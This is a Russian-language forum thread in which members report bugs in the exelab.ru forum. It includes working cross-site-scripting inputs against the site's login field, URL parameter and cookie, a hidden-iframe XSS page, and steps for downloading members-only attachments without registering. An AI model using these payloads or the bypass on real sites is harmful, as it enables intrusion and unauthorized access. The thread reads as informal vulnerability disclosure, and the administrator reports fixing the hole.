Сейчас на форуме: Rio, johnniewalker, vsv1 (+6 невидимых)

 eXeL@B —› Крэки, обсуждения —› Bugs на exelab.ru/f
<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . >>
Посл.ответ Сообщение

Ранг: 37.8 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 15 марта 2007 00:44 · Поправил: Модератор
· Личное сообщение · #1

Выкладываем всевозможные ошибки форума с описаниями, дабы форум был лучше, выше, сильнее!




Ранг: 106.6 (ветеран)
Активность: 0.10
Статус: Участник

Создано: 30 апреля 2007 22:48
· Личное сообщение · #2

solovej пишет:
Захожу в установки, а окно где мой ник совсем неактивно

дык это у всех так, ник нельзя менять.



Ранг: 15.4 (новичок)
Активность: 0.020
Статус: Участник

Создано: 08 мая 2007 01:36
· Личное сообщение · #3

Короче нашёл прикольную фичу на форуме.
При входе в форум вводите такие данные:
Логин: >
Пароль: ">_любое слово_

После этого вверху появится надпись которую вы ввели вместо "_любое слово_".
И также посмотрите в самом низу в названия дополнительных функций они тоже изменятся.



Ранг: 15.4 (новичок)
Активность: 0.020
Статус: Участник

Создано: 08 мая 2007 02:52 · Поправил: vitalya2903
· Личное сообщение · #4

Обана!!! Нашёл по интереснее:
Логин: >
Пароль: "><img src="Путь к графическому файлу на компьютере">_любое слово_
например: "><img src="D:/cr.jpg">привет

После этого вверху появится картинка на которую вы указали путь и слово которое ввели.
Внизу где дополнительные функции тоже появится эта картинка, причём их будет 5 штук.


\ Ой млин... а введите такое и посмотрите вниз - вы вообще офигеете:
Логин: >
Пароль: "><table><tr><td>hello</td><td>buy</td></tr><tr><td>hello</td><td>buy</td></tr></table>privet





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 08 мая 2007 03:08
· Личное сообщение · #5

если нажать "выход", потом перевести свои часы на месяц вперёд и попытаться войти снова, то... после авторизации вы будете... не авторизованы... однако появитесь в списке "сейчас на форуме"... вот... хрень короче... и не только на краклабе такое... на руборде тоже.... и на других многих...

-----
Do Not Get Mad Get Money! ;)





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 08 мая 2007 09:09
· Личное сообщение · #6

vitalya2903 Чует мое сердце ломанут скоро форум

-----
Nulla aetas ad discendum sera




Ранг: 25.6 (посетитель)
Активность: 0.040
Статус: Участник

Создано: 08 мая 2007 14:18 · Поправил: solovej
· Личное сообщение · #7

потерто мной.




Ранг: 353.0 (мудрец)
Активность: 0.370
Статус: Участник
resreveR

Создано: 08 мая 2007 14:22 · Поправил: lord_Phoenix
· Личное сообщение · #8

solovej
1. Это тема не для этого.
2. Какую тему.
3. Такое пишите модерам в приват.
4. Я знаю кто закрыл, но не скажу. Если он сочтет нужным - напишет.

-----
Тут не могла быть ваша реклама




Ранг: 15.4 (новичок)
Активность: 0.020
Статус: Участник

Создано: 08 мая 2007 16:17
· Личное сообщение · #9

Flint пишет:
Чует мое сердце ломанут скоро форум

Эт точно. Написать нужную скриптяку и ВСЁ!!!




Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 08 мая 2007 17:54
· Личное сообщение · #10

vitalya2903 пишет:
Написать нужную скриптяку и ВСЁ!!!

ЧЕПУХА! Изменения, описанные тобой ведь не сохраняются и распространяются лишь на 1-у страницу
От любого скрипта будет эффект не больше, чем если бы ты просто скачал страницу, а потом в оффлайне исправил бы ее

-----
программистом не рождаются - им умирают





Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 08 мая 2007 18:07
· Личное сообщение · #11

vitalya2903 пишет:
"><table><tr><td>hello</td><td>buy</td></tr><tr><td>hello</td><td>buy< /td></tr></table>privet


Кстати! Пароль - не более 32 знаков. От твоего искусства попадает только "><table><tr><td>hello</td><td> - ИМХО маловато будет для любого вредного скрипта

-----
программистом не рождаются - им умирают




Ранг: 15.4 (новичок)
Активность: 0.020
Статус: Участник

Создано: 08 мая 2007 18:13
· Личное сообщение · #12

Gambit пишет:
Пароль - не более 32 знаков. ИМХО маловато будет для любого вредного скрипта


Да я это уже понял - так что облом




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 08 мая 2007 20:10
· Личное сообщение · #13

vitalya2903
Нуну...

hexcsl.com/xss/smile.jpg
Еслиб эту картинку запостил бы в другом месте наверное никто бы и не просек ничего

Так что по ссылкам щелкаем внимательней. Да и желательно пофиксить в самое ближайшее время!!! BG не спи

-----
Computer Security Laboratory





Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 08 мая 2007 21:28
· Личное сообщение · #14

Гы, а чё это?




Ранг: 353.0 (мудрец)
Активность: 0.370
Статус: Участник
resreveR

Создано: 08 мая 2007 21:33
· Личное сообщение · #15

<HTML>
<BODY>
<TABLE width=100% height=100%><TR><TD align=center>
<TABLE><TR><TD valign=right>
</TD></TR></TABLE>
<IMG SRC="SMILE.JPG">
</TD></TR>
</TD></TR></TABLE>
<iframe src="http://www.exelab.ru/f/user_usr=aaa&user_pwd=222%22%3 E%3Cscript%3Ealert('XSS CRACKLAB.RU ');%3C/script%3E%3Ca%20%22&mode=aaaa" width=0 height=0 frameborder=0 style="position:absolute; top:0; left:0; z-index:0;"></iframe>
</BODY>
</HTML>


-----
Тут не могла быть ваша реклама




Ранг: 15.4 (новичок)
Активность: 0.020
Статус: Участник

Создано: 08 мая 2007 21:56
· Личное сообщение · #16

Введите такое и увидите как все темы и форумы поплывут по экрану, в прямом смысле этого слова.
Логин: >
Пароль: "><MARQUEE>

З.Ы. Я был в шоке




Ранг: 107.6 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 08 мая 2007 23:06
· Личное сообщение · #17

vitalya2903
Блин, хорош! Вставил хтмл-тэг бегущей строки и радуется...
Ты теперь еще предложи весь хтмл перепробовать

-----
программистом не рождаются - им умирают




Ранг: 79.6 (постоянный), 2thx
Активность: 0.080
Статус: Участник
алХимик

Создано: 08 мая 2007 23:26
· Личное сообщение · #18

чернобля скачал учебник по хтмл-ю =))

-----
Все говорят что мы вместе. Но не многие знают в каком.





Ранг: 213.0 (наставник), 4thx
Активность: 0.220
Статус: Участник
Тот ещё Lamer

Создано: 09 мая 2007 01:58
· Личное сообщение · #19

SeDoYHg пишет:
чернобля скачал учебник по хтмл-ю =))

скорее просто открыл хтмл-код какой-то страницы... в учебнике он уже давно по-круче теги нашёл...

-----
Do Not Get Mad Get Money! ;)





Ранг: 536.4 (!), 171thx
Активность: 0.660.13
Статус: Администратор
Создатель CRACKL@B

Создано: 09 мая 2007 22:38
· Личное сообщение · #20

Дырка закрыта. Найдёте более опасные дырки - пишите в личку, незачем публиковать.

-----
Всем не угодишь




Ранг: 158.7 (ветеран)
Активность: 0.110
Статус: Участник

Создано: 20 мая 2007 02:36
· Личное сообщение · #21

Вообщем всё читать лень поэтому не факт что такое не встречалось...
Сама проблемма:
т.к. в world wide не печатаются (точнее не переносяться на форум) буквы кирилицы, то при цитировании получаеться
iNNos ?????:
т.е. на месте вопросов должно стоять "пишет", но к сожалению наши нерусскоговорящие друзья наблюдают не очень красивую картинку.

-----
Я ещё не волшебник, я только учусь...





Ранг: 536.4 (!), 171thx
Активность: 0.660.13
Статус: Администратор
Создатель CRACKL@B

Создано: 20 мая 2007 21:25
· Личное сообщение · #22

Assass1n
Не думаю что видеть слово "пишет" иностранцам будет понятнее. В любом случае подразумевается, что юзающие иностранный подфорум используют и англоязычный интерфейс в настройках.

-----
Всем не угодишь




Ранг: 1.8 (гость)
Активность: 0=0
Статус: Участник

Создано: 10 марта 2008 15:27 · Поправил: beerhack
· Личное сообщение · #23

http://www.exelab.ru/f/user_usr="><script>alert()</script>

Опять XSS
Только куки перед этим удалите, а то с ними не робит.



Ранг: 159.1 (ветеран), 7thx
Активность: 0.130
Статус: Участник

Создано: 10 марта 2008 16:59
· Личное сообщение · #24

beerhack

Bad_guy пишет:
Найдёте более опасные дырки - пишите в личку, незачем публиковать.




Ранг: 1.8 (гость)
Активность: 0=0
Статус: Участник

Создано: 10 марта 2008 17:11
· Личное сообщение · #25

tempread
Да это ж не "более опасная дырка", а такая же самая как и пару постами выше, только в другой переменной. Интересно конечно, переменные рядом находятся - одну пофиксили, а вторую что на закуску оставили Бэд, не зивай.



Ранг: 49.6 (посетитель), 9thx
Активность: 0.030
Статус: Участник

Создано: 10 марта 2008 17:52 · Поправил: huckfuck
· Личное сообщение · #26

Давно уже я обнаружил лазейку, позволяющую скачивать файлы с форума НЕ только участникам форума (это баг или так и должно быть ?)

Не регясь, заходим на форум в какой-нибудь топик

Видим надпись вместо ссылки: "{ Аттач доступен только для участников форума }"

Нажимаем на правую кнопку мыши, выбираем "Исходный текст" (в Опере)

Ищем строку: "files/"

Чуть правее будет название архива, например "7a52_03.10.2007_CRACKLAB.rU.tgz"

Формируем строку вида: http://www.exelab.ru/f/files/название_архива

Например, http://www.exelab.ru/f/files/7a52_03.10.2007_CRACKLAB.rU.tgz

Скачиваем файл




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 10 марта 2008 18:58
· Личное сообщение · #27

huckfuck
об этом давным давно было известно и не распространяли особо. кому надо слить он сольет файло так или иначе.

beerhack
писать надо в приват БГ, а не на паблик кидать.

-----
Computer Security Laboratory





Ранг: 279.1 (наставник)
Активность: 0.160
Статус: Участник
wizard

Создано: 11 марта 2008 14:11
· Личное сообщение · #28

[HEX] пишет:
кому как если твои пароли, бг и многих других форумчан уплывут хз куда и попадут в хз какие руки это опасным считать или нет?


[HEX] в данном случаи ,я имел ввиду ,что если ктото скачает файл (который доступен только участникам ) без регистрации на форуме ,то ничего жутко страшного в этом нет ,кому надо будет ,тот и зарегится ,чтобы скачать.

-----
Что один человек сделал , другой всегда сломать может...





Ранг: 2014.5 (!!!!), 1278thx
Активность: 1.340.25
Статус: Модератор
retired

Создано: 11 марта 2008 16:09
· Личное сообщение · #29

Заканчивайте оффтопить то, а то развели, насколько страшно... придёт товарищ-поправит.



Ранг: 1.8 (гость)
Активность: 0=0
Статус: Участник

Создано: 14 марта 2008 19:55 · Поправил: beerhack
· Личное сообщение · #30

beerhack пишет:
http://www.exelab.ru/f/user_usr="><script>alert()</script>

И еще если изменить в своих куках значение f miniBBsite на "><script>alert()</script> то будет таже история


[HEX] пишет:
писать надо в приват БГ, а не на паблик кидать.

Ну ведь не зря эта тема создавалась, народу ведь тоже интересно. Хотя...да... баги и дырки чуть-чуть разные вещи.




Ранг: 467.7 (мудрец), 5thx
Активность: 0.270
Статус: Участник
Иной :)

Создано: 14 марта 2008 23:09
· Личное сообщение · #31

beerhack пишет:
И еще если изменить в своих куках значение f miniBBsite на "><script>alert()</script> то будет таже история

Ну это уже впринципе сложно назвать дыркой и воспользоваться ей впринципе никак нельзя если только той же XSS перезаписать куку для вызова опять таки же XSS

-----
Computer Security Laboratory



<< . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . >>
 eXeL@B —› Крэки, обсуждения —› Bugs на exelab.ru/f
:: Ваш ответ
Жирный  Курсив  Подчеркнутый  Перечеркнутый  {mpf5}  Код  Вставить ссылку 
:s1: :s2: :s3: :s4: :s5: :s6: :s7: :s8: :s9: :s10: :s11: :s12: :s13: :s14: :s15: :s16:


Максимальный размер аттача: 500KB.
Ваш логин: german1505 » Выход » ЛС
   Для печати Для печати